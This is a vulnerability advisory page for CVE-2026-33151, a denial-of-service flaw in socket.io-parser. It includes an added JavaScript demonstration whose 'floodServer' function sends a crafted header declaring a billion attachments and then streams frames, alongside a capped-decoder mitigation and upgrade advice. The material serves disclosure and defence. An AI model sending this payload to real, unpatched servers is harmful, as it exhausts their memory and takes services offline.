CVE-2026-33151
PUBLISHED
CVSS 8.7 HIGH
Socket.IO is an open source, real-time, bidirectional, event-based communication framework. In socket.io-parser prior to versions 3.3.5, 3.4.4, and 4.2.6, a specially crafted Socket.IO packet can declare a very large number of binary attachments; the server then waits for those attachments and buffers every binary frame it receives in the meantime, which can be exploited to make the server run out of memory. This issue has been patched in socket.io-parser versions 3.3.5, 3.4.4, and 4.2.6. Because socket.io-parser is pulled in as a dependency of the socket.io server package, check the resolved parser version (for example with `npm ls socket.io-parser`) rather than the socket.io version alone.
EPSS 0.05% (16.3rd percentile)
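The buffering step the description refers to, as an added example that is not socket.io-parser's own code and not the fix from the linked commits: a minimal decoder for the Socket.IO packet header (`<type>[<attachments>-][/<nsp>,][<id>]<json>`) that holds binary frames until the declared attachment count arrives. With `maxAttachments` left unbounded it reproduces the problem, and with a cap it rejects the oversized header before anything is buffered. The `Decoder` and `floodServer` names, the `maxAttachments` option and the cap of 8 are assumptions of this example, and the attack packet and frames are constructed inline.

```javascript
// Added example (not socket.io-parser's code). Demonstrates how an
// attacker-chosen attachment count turns the parser into an unbounded buffer,
// and how a cap on that count (an assumed mitigation) stops it.

const BINARY_EVENT = 5;
const BINARY_ACK = 6;

// Parse the text part of a packet: <type>[<attachments>-][/<nsp>,][<id>]<json>
function decodeString(str) {
  if (!/^[0-6]$/.test(str.charAt(0))) throw new Error("unknown packet type");
  const packet = { type: Number(str.charAt(0)), nsp: "/" };
  let i = 1;

  // The "<n>-" count is only present for binary packets and is client-controlled.
  if (packet.type === BINARY_EVENT || packet.type === BINARY_ACK) {
    const end = str.indexOf("-", i);
    const raw = end === -1 ? "" : str.substring(i, end);
    if (!/^\d+$/.test(raw) || !Number.isSafeInteger(Number(raw))) {
      throw new Error("illegal attachments");
    }
    packet.attachments = Number(raw);
    i = end + 1;
  }

  if (str.charAt(i) === "/") {
    let end = str.indexOf(",", i);
    if (end === -1) end = str.length;
    packet.nsp = str.substring(i, end);
    i = end + 1;
  }

  const idStart = i;
  while (i < str.length && str.charCodeAt(i) >= 48 && str.charCodeAt(i) <= 57) i++;
  if (i > idStart) packet.id = Number(str.substring(idStart, i));

  const rest = str.substring(i);
  packet.data = rest === "" ? undefined : JSON.parse(rest);
  return packet;
}

// Swap {_placeholder:true, num:k} markers for the k-th binary attachment.
function replacePlaceholders(data, buffers) {
  if (Array.isArray(data)) return data.map((d) => replacePlaceholders(d, buffers));
  if (data && typeof data === "object") {
    if (data._placeholder === true && Number.isInteger(data.num)) return buffers[data.num];
    const out = {};
    for (const k of Object.keys(data)) out[k] = replacePlaceholders(data[k], buffers);
    return out;
  }
  return data;
}

// maxAttachments = Infinity reproduces the unbounded (vulnerable) behaviour;
// a finite cap is the assumed mitigation shown here.
class Decoder {
  constructor({ maxAttachments = Infinity } = {}) {
    this.maxAttachments = maxAttachments;
    this.pending = null; // { packet, buffers } while waiting for attachments
    this.delivered = [];
  }

  bufferedBytes() {
    return this.pending ? this.pending.buffers.reduce((n, b) => n + b.length, 0) : 0;
  }

  add(chunk) {
    if (typeof chunk === "string") {
      const packet = decodeString(chunk);
      if (packet.attachments > this.maxAttachments) {
        throw new Error(`too many attachments: ${packet.attachments}`);
      }
      if (packet.attachments > 0) this.pending = { packet, buffers: [] };
      else this.delivered.push(packet);
      return;
    }
    if (!this.pending) throw new Error("got binary data when not reconstructing a packet");
    this.pending.buffers.push(chunk); // held in memory until the count is reached
    if (this.pending.buffers.length === this.pending.packet.attachments) {
      const { packet, buffers } = this.pending;
      this.pending = null;
      packet.data = replacePlaceholders(packet.data, buffers);
      delete packet.attachments;
      this.delivered.push(packet);
    }
  }
}

// Constructed attack: a header claiming one billion attachments followed by a
// stream of binary frames. Returns the bytes still held by the decoder, or the
// rejection reason if the header was refused.
function floodServer(decoder, frames, frameSize) {
  const header = '51000000000-["upload",{"_placeholder":true,"num":0}]';
  try {
    decoder.add(header);
  } catch (e) {
    return { rejected: e.message, buffered: 0 };
  }
  for (let k = 0; k < frames; k++) decoder.add(Buffer.alloc(frameSize, 0x41));
  return { rejected: null, buffered: decoder.bufferedBytes() };
}
```

Engine.IO's `maxHttpBufferSize` bounds the size of one message, not how many messages the parser keeps while waiting for attachments, so a per-frame limit alone does not close this; the count has to be bounded at the header, as the cap above does. In practice the remediation is upgrading socket.io-parser to a patched version, not reimplementing the decoder.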
Risk Scores
CVSS v4.0
8.7
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score
0.05%
16.3rd percentile
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| npm | socket.io-parser | >= 4.0.0, < 4.2.6; >= 0, < 3.3.5; >= 3.4.0, < 3.4.4 |
| socketio | socket.io | >= 4.0.0, < 4.2.6; < 3.3.5; >= 3.4.0, < 3.4.4 |
Timeline
- Mar 18, 2026 CVE Published
- Mar 19, 2026 Security Advisory
- Mar 20, 2026 CVE Updated
- Mar 20, 2026 PoC Published
- Mar 21, 2026 EPSS Score
- Mar 22, 2026 EPSS Score
- Mar 22, 2026 Coalition ESS Score
- Mar 23, 2026 EPSS Score
- Mar 24, 2026 EPSS Score
- Mar 25, 2026 EPSS Score
- May 18, 2026 EPSS Score
- May 19, 2026 EPSS Score
References
- Advisory: https://github.com/socketio/socket.io/security/advisories/GHSA-677m-j7p3-52f9
- Commit: https://github.com/socketio/socket.io/commit/719f9ebab0772ffb882bd614b387e585c1aa75d4
- Commit: https://github.com/socketio/socket.io/commit/9d39f1f080510f036782f2177fac701cc041faaf
- Commit: https://github.com/socketio/socket.io/commit/b25738c416c4e32fbff62ee182afa8f6d0dacf78
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-33151
- Package: https://github.com/socketio/socket.io